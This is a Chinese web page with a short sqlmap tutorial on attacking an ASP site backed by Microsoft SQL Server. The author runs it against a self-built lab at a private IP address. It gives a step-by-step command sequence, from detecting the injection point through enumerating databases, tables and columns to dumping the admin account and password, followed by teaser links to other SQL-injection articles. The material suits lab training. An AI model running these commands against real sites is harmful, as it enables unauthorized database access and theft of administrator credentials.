您当前的位置：首页 > 电脑百科 > 安全防护 > 数据安全

实战黑客sqlmap渗透攻击mssql数据库最新教程

时间：2020-03-18 11:37:08 来源：作者：

+ 加入收藏

今天搭建了一个asp+mssql数据库的环境用于安全测试学习

1.判断注入点及获取网站信息：

sqlmap -u http://192.168.1.30/1/onews.asp?id=8

web server operating system: windows 2003 or XP

web Application technology: ASP.NET, Microsoft IIS 6.0, ASP

back-end DBMS: Microsoft SQL Server 2005

2.获取所有数据库：

sqlmap -u http://192.168.1.30/1/onews.asp?id=8 --dbs

网站用的数据库是这个sqlZR

3.获取网站当前使用的数据库：

sqlmap -u http://192.168.1.30/1/onews.asp?id=8 --current-db

4.获取数据库中的表名：

sqlmap -u http://192.168.1.30/1/onews.asp?id=8 -D sqlZR --tables

5.获取数据表中的字段名：

sqlmap -u http://192.168.1.30/1/onews.asp?id=8 -D sqlZR -T Admin --columns

6.获取字段中的内容

sqlmap -u http://192.168.1.30/1/onews.asp?id=8 -D sqlZR -T admin -C "admin,password" --dump

看到了吧，几条命名就把管理员的账号密码给跑出来了。

Tags：渗透攻击点击:() 评论:()

声明：本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com)，我们将及时更正、删除，谢谢。

▌相关推荐

实战黑客sqlmap渗透攻击mssql数据库最新教程

今天搭建了一个asp+mssql数据库的环境用于安全测试学习1.判断注入点及获取网站信息：sqlmap -u http://192.168.1.30/1/onews.asp?id=8 web server operating system: Windows...【详细内容】

2020-03-18　　Tags: 渗透攻击点击:(612)　　评论:(0)　　加入收藏

黑客渗透攻击必备环境DVWA简介及搭建

黑客渗透攻击必备环境DVWA简介及搭建dVWA简介DVWA（Damn Vulnerable Web App）是一个基于PHP/MySql搭建的Web应用程序，旨在为安全专业人员测试自己的专业技能和工具提供合法的环...【详细内容】

2019-08-06　　Tags: 渗透攻击点击:(392)　　评论:(0)　　加入收藏

▌简易百科推荐

怀疑流氓软件后台偷偷读文件？教你如何实锤

众所周知，Windows系统流氓软件众多，其中不乏出身大厂的产品。这些带有流氓性质的软件，很多都会偷偷扫描系统数据，读取用户文件，造成电脑卡顿拖慢不说，还严重侵害了个人隐私，造成巨...【详细内容】

2021-12-06　　趣玩APPS　　　　Tags:流氓软件　点击:(16)　　评论:(0)　　加入收藏

一次某大学sql注入到getshell

前言目标是一大学，在一次挖洞过程中遇到个sql注入，尝试进一步利用扩大危害，漏洞已报送平台进行了修复私信我获取网络安全学习资料 1.2000多本网络安全系列电子书 2.网络安全标...【详细内容】

2021-11-26　　IT野涵　　　　Tags:sql注入　点击:(21)　　评论:(0)　　加入收藏

数据库：评估安全风险4个要点

互联网时代，不论是个人还是组织，都将数据视为一项重要的资产。为了便于存储、管理，企业常常会为各项数据建立一个数据库，如果没有做好安全风险防护，一旦数据库被攻占，企业将迎来很...【详细内容】

2021-10-28　　快快网络　　企鹅号　　Tags:数据库　点击:(50)　　评论:(0)　　加入收藏

攻防演练中攻击方是如何打开缺口的方法

前言(可能思路狭隘，有缺有错，师傅们多带带)【查看资料】Author: 0ne本篇文章数据来源于18+省市级别HVV，90+单位失陷报告。(一部分是笔者的参与，一部分是薅的公司其他师傅的报告...【详细内容】

2021-10-28　　IT野涵　　　　Tags:缺口　点击:(46)　　评论:(0)　　加入收藏

一次简单的SQL注入绕WAF

本人也是小白一枚，大佬请绕过，这个其实是六月份的时候做的，那时候想多点实战经验，就直接用谷歌搜索找了一些网站，这个是其中一个1、目标网站 2、发现有WAF防护 3、判断存在注入...【详细内容】

2021-10-19　　　　博客园　　Tags:SQL注入　点击:(52)　　评论:(0)　　加入收藏

如何避免出现SQL注入漏洞

一前言本文将针对开发过程中依旧经常出现的SQL编码缺陷，讲解其背后原理及形成原因。并以几个常见漏洞存在形式，提醒技术同学注意相关问题。最后会根据原理，提供解决或缓解方案...【详细内容】

2021-09-17　　woaker　　　　Tags:SQL注入漏洞　点击:(67)　　评论:(0)　　加入收藏

部分sql注入总结

前言本人ctf选手一名，在最近做练习时遇到了一些sql注入的题目，但是sql注入一直是我的弱项之一，所以写一篇总结记录一下最近学到的一些sql注入漏洞的利用。可回显注入联合注入在...【详细内容】

2021-08-26　　合天网安实验室　　　　Tags:sql注入　点击:(60)　　评论:(0)　　加入收藏

IPFS真的这么牛吗？它是如何解决数据安全的问题的？

“放纵自己的欲望是最大的祸害，窥探别人的隐私是最大的罪恶，不知自己的过失是最大的病痛”。上文咱们知道了目前互联网的数据安全存在隐患，数据安全的问题，每天都在发生，只不过...【详细内容】

2021-08-13　　小陶子矿工　　　　Tags:IPFS 　点击:(79)　　评论:(0)　　加入收藏

sql注入绕过与sqlmap绕过使用总结

前言最近挖edusrc的时候遇到有注入点但是有waf绕不过，头疼。可以看到还是phpstudy建站的，太熟悉了这个，不知道这个什么waf各位师傅知道的可以评论一下，所以写这篇文章是供各位...【详细内容】

2021-08-13　　IT影子　　　　Tags:sql注入　点击:(66)　　评论:(0)　　加入收藏

我要悄悄地注入，然后惊艳所有人！（SQL快速注入漏洞技巧）

1. 使用 Burpsuite： 1. Capture the request using burpsuite. 2. Send the request to burp scanner. 3. Proceed with active scan. 4. Once the scan is finished, l...【详细内容】

2021-08-04　　李志宽　　　　Tags:SQL注入　点击:(74)　　评论:(0)　　加入收藏

推荐资讯

聊聊如何自定义数据脱	河南人到底有多爱吃面
人称“犬中四煞”的4	离婚后，约定每月给孩子
“三皇五帝”分别是哪	印度低种姓群体如何翻
日本研发“飞行摩托”	2021年Steam最畅销游

黑客渗透攻击必备环境DVWA简介及搭建